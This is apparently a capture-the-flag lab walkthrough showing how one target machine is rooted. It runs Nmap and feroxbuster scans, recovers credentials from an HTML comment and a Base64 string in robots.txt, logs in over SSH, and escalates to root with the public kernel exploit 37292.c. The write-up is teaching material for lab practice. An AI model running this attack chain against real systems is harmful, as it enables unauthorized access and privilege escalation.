๐งญ Step 1: Initial Enumeration
Started with aggressive Nmap scan:
nmap -sCV -A โ min-rate 1000 192.168.xx.xx
Explanation:
- -sC โ Default scripts
- -sV โ Service version detection
- -A โ OS detection + scripts + traceroute
- โ min-rate 1000 โ Faster scan

Discovered:
- HTTP service running
- SSH service available

๐ Step 2: Source Code Analysis
Opened the website in browser.
Checked page source:
Right Click โ View Page Source
Found a hidden username inside the HTML comments.
Small details in source code often lead to credentials.

๐ Step 3: Directory Enumeration
Performed directory brute forcing:
Command:-
feroxbuster โurl http://192.168.xx.xx -w /usr/share/wordlists/dirb/common.txt
Discovered:
/robots.txt

๐ Step 4: Analyzing robots.txt
Accessed:
http://192.168.xx.xx/robots.txt

Found encoded Base64 data.
Decoded using:
echo "base64_string_here" | base64 -d
Successfully retrieved a password.

๐ Step 5: SSH Access
Used discovered credentials:
ssh username@192.168.xx.xx
User shell obtained successfully.

โก Step 6: Privilege Escalation โ Kernel Exploit
Checked kernel version:
uname -a
Identified:
3.13.0โ32-generic

Searched for available exploits:
searchsploit 3.13.0โ32-generic

Found suitable kernel exploit (example: 37292.c).
Downloaded exploit:
searchsploit -m 37292

Transferred exploit to target machine.

๐ Step 7: Compile & Execute Exploit
On target machine:
gcc 37292.c -o exploit

Run:
./exploit

Root shell successfully obtained.
๐ Final Outcome
โ๏ธ Service Enumeration โ๏ธ Source Code Inspection โ๏ธ Directory Brute Force โ๏ธ Base64 Decoding โ๏ธ SSH Access โ๏ธ Kernel Exploit Compilation โ๏ธ Root Access Achieved
๐ฅ Full Practical Demonstration
For a complete step-by-step video walkthrough, watch here: